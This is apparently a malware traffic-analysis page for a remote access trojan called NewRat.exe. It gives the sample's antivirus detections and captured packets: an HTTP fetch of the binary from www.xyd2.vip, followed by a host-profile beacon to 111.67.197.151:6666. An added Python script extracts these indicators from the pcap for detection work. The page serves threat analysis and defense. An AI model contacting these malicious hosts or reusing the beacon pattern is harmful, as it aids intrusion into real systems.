111.67.197.151.6666 RAT Remote Access Trojan Malware Trojan PCAP File Download Traffic Sample

Download Attachments

  • pcap newrat
    Date added: December 17, 2016 5:35 am Added by: admin File size: 82 KB Downloads: 68

SHA256:     028f3aff1bbb9bdc57fd0ed7bff829b12a6f47872655f85e49001624ddb57e94
File name:     NewRat.exe
Detection ratio:     50 / 56
Analysis date:     2016-12-17 01:49:07 UTC

Antivirus     Result     Update
ALYac     Generic.ServStart2.B7BD945B     20161217
AVG     Atros.BOTV     20161216
AVware     BehavesLike.Win32.Malware.wsc (mx-v)     20161217
Ad-Aware     Generic.ServStart2.B7BD945B     20161217
AegisLab     Troj.W32.Gen.mner     20161216
AhnLab-V3     Trojan/Win32.Regrun.R153612     20161216
Antiy-AVL     Trojan[:HEUR]/Win32.AGeneric     20161217
Arcabit     Generic.ServStart2.B7BD945B     20161217
Avast     Win32:Malware-gen     20161217
Avira (no cloud)     TR/Dldr.Yemrok.aona     20161216
Baidu     Win32.Trojan.ServStart.aw     20161207
BitDefender     Generic.ServStart2.B7BD945B     20161217
Bkav     W32.Clodf83.Trojan.75df     20161216
Comodo     TrojWare.Win32.GameThief.Magania.~NWABI     20161216
CrowdStrike Falcon (ML)     malicious_confidence_100% (W)     20161024
Cyren     W32/NewMalware-Rootkit-I-based!     20161217

111.67.197.151.6666

Stage 1: the RAT binary is fetched over plain HTTP from www.xyd2.vip (123.1.157.146) with an IE8 / Windows XP user agent. The raw tcpdump -A payload dumps did not survive extraction; only the tcpdump summary lines and the decoded request are kept.

2016-12-16 22:10:42.464406 IP 192.168.1.102.59577 > 123.1.157.146.80: Flags [P.], seq 0:285, ack 1, win 256, length 285: HTTP: GET /NewRat.exe HTTP/1.1
GET /NewRat.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.xyd2.vip
Connection: Keep-Alive

2016-12-16 22:10:42.771947 IP 192.168.1.102.59577 > 123.1.157.146.80: Flags [.], ack 2921, win 256, length 0
2016-12-16 22:10:43.055447 IP 192.168.1.102.59577 > 123.1.157.146.80: Flags [.], ack 5841, win 256, length 0

Stage 2: about 22 seconds after the download, the host opens a TCP session to 111.67.197.151 on port 6666 and, right after the handshake, pushes a 1164-byte check-in. The body is mostly null bytes; the printable fields that survive read like a host profile (OS version, a "Vip" tag, a year, a CPU speed and the number 3389, which is the default RDP port). Three-way handshake and first push:

2016-12-16 22:11:04.979590 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [S], seq 3889994307, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-12-16 22:11:05.234889 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [.], ack 3576552473, win 256, length 0
2016-12-16 22:11:05.247183 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [P.], seq 0:1164, ack 1, win 256, length 1164
    payload, printable runs only (the rest of the 1164 bytes is null padding): Win XP ... Vip ... 2015 ... 1 ... 2499MHz ... 3389
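To make the two indicators above reproducible from the pcap itself, here is an added example (not code from this page or from any tool it references) that walks a pcap in pure Python and pulls out the HTTP request that fetched NewRat.exe and the first large push to TCP/6666, together with the printable fields of the beacon. The pcap it parses is constructed inside the script to mirror the hosts, ports and headers shown on this page; the timestamps, the beacon's byte layout, the 512-byte beacon threshold and every function name are assumptions. Feed parse_pcap the bytes of the real file to run it on the actual sample.

```python
"""Walk a pcap without third-party modules and pull out the two indicators the capture
above shows: the HTTP fetch of NewRat.exe and the 1164-byte first push to TCP/6666."""
import re
import socket
import struct

SYN, ACK, PSH_ACK = 0x02, 0x10, 0x18


def tcp_frame(src, sport, dst, dport, flags, payload=b"", seq=0, ack=0):
    """Ethernet/IPv4/TCP bytes for a constructed packet; checksums stay zero (not checked below)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 256, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 128, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def build_pcap(records):
    """Little-endian pcap file, LINKTYPE_ETHERNET; records are (sec, usec, frame)."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for sec, usec, frame in records:
        out.append(struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame)
    return b"".join(out)


def parse_pcap(data):
    """Yield (src, sport, dst, dport, flags, payload) for each IPv4/TCP frame in the file."""
    endian = "<" if struct.unpack_from("<I", data, 0)[0] == 0xA1B2C3D4 else ">"
    if struct.unpack_from(endian + "I", data, 20)[0] != 1:
        raise ValueError("only the Ethernet link type is handled here")
    off = 24
    while off + 16 <= len(data):
        incl = struct.unpack_from(endian + "IIII", data, off)[2]
        frame = data[off + 16:off + 16 + incl]
        off += 16 + incl
        if frame[12:14] != b"\x08\x00" or frame[14 + 9] != 6:
            continue                          # not IPv4, or IPv4 but not TCP
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack_from("!H", ip, 2)[0]
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        yield (socket.inet_ntoa(ip[12:16]), sport, socket.inet_ntoa(ip[16:20]), dport,
               tcp[13], tcp[(tcp[12] >> 4) * 4:])


HTTP_REQ = re.compile(rb"^(GET|POST) (\S+) HTTP/1\.[01]\r\n(.*)", re.S)


def extract_iocs(pcap_bytes, c2_port=6666, min_beacon=512):
    """HTTP requests (host, URI, UA) plus any sizeable first data push to the C2 port."""
    downloads, beacons = [], []
    for src, sport, dst, dport, flags, payload in parse_pcap(pcap_bytes):
        m = HTTP_REQ.match(payload)
        if m:
            hdrs = dict(re.findall(rb"^([\w-]+): (.*?)\r?$", m.group(3), re.M))
            downloads.append({"dst": f"{dst}:{dport}", "uri": m.group(2).decode(),
                              "host": hdrs.get(b"Host", b"").decode(),
                              "user_agent": hdrs.get(b"User-Agent", b"").decode()})
        elif flags == PSH_ACK and dport == c2_port and len(payload) >= min_beacon:
            # the printable runs are where the host profile (OS, CPU, port number) lives
            strings = [s.decode() for s in re.findall(rb"[\x20-\x7e]{3,}", payload)]
            beacons.append({"dst": f"{dst}:{dport}", "length": len(payload), "strings": strings})
    return {"downloads": downloads, "beacons": beacons}


# Constructed stand-in for the real capture (assumption): same hosts and ports, request
# headers copied from the page, beacon body is a zero-padded buffer with the same fields.
_GET = (b"GET /NewRat.exe HTTP/1.1\r\n"
        b"Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*\r\n"
        b"Accept-Language: en-us\r\n"
        b"User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)\r\n"
        b"Accept-Encoding: gzip, deflate\r\nHost: www.xyd2.vip\r\nConnection: Keep-Alive\r\n\r\n")
_BEACON = (b"\x00" * 16 + b"Win XP" + b"\x00" * 64 + b"Vip" + b"\x00" * 4 + b"2015"
           + b"\x00" * 20 + b"1" + b"\x00" * 2 + b"2499MHz" + b"\x00" * 28 + b"3389")
_BEACON += b"\x00" * (1164 - len(_BEACON))
VICTIM, DROP, C2 = "192.168.1.102", "123.1.157.146", "111.67.197.151"
SAMPLE_PCAP = build_pcap([
    (1481926242, 464406, tcp_frame(VICTIM, 59577, DROP, 80, PSH_ACK, _GET, seq=1, ack=1)),
    (1481926264, 979590, tcp_frame(VICTIM, 59578, C2, 6666, SYN, seq=3889994307)),
    (1481926265, 234889, tcp_frame(VICTIM, 59578, C2, 6666, ACK, seq=3889994308, ack=3576552473)),
    (1481926265, 247183, tcp_frame(VICTIM, 59578, C2, 6666, PSH_ACK, _BEACON,
                                   seq=3889994308, ack=3576552473)),
])

if __name__ == "__main__":
    for kind, hits in extract_iocs(SAMPLE_PCAP).items():
        print(kind, hits)
```

The beacon rule is deliberately narrow (PSH/ACK, the known port, at least 512 bytes): it picks out the check-in shown above without firing on the ACK-only packets or on the HTTP stream, and the same three conditions are what you would carry into a Suricata rule for this sample. Widening it to any non-HTTP port means also whitelisting TLS and other legitimate first-push protocols.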


Background traffic in the same capture, two minutes later: by its headers this is the Google Update client pulling GoogleUpdateSetup.exe through BITS (ranged requests to redirector.gvt1.com), not a second stage of the RAT. It is kept here so the file is not mistaken for a second malware download.

2016-12-16 22:13:12.678256 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [.], ack 7781, win 256, length 0
2016-12-16 22:13:13.731458 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [P.], seq 2184:2623, ack 7781, win 256, length 439: HTTP: GET /edgedl/release2/93c2c6lma34er8r6lb3ntekrnresjh08hjdgmygbd5jazduckt1jkhlvqnelx75vp5jtdbid37u0iiynwwvvwbdz8yvemt5abv5/GoogleUpdateSetup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=70904-113270
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
X-GoogleUpdate-Interactivity: bg
User-Agent: Microsoft BITS/6.7
Host: redirector.gvt1.com
Connection: Keep-Alive

2016-12-16 22:13:13.771889 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [.], ack 9337, win 256, length 0
2016-12-16 22:13:14.795676 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [P.], seq 2623:3063, ack 9337, win 256, length 440: HTTP: GET /edgedl/release2/93c2c6lma34er8r6lb3ntekrnresjh08hjdgmygbd5jazduckt1jkhlvqnelx75vp5jtdbid37u0iiynwwvvwbdz8yvemt5abv5/GoogleUpdateSetup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=113271-202459
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
X-GoogleUpdate-Interactivity: bg
User-Agent: Microsoft BITS/6.7
Host: redirector.gvt1.com
Connection: Keep-Alive
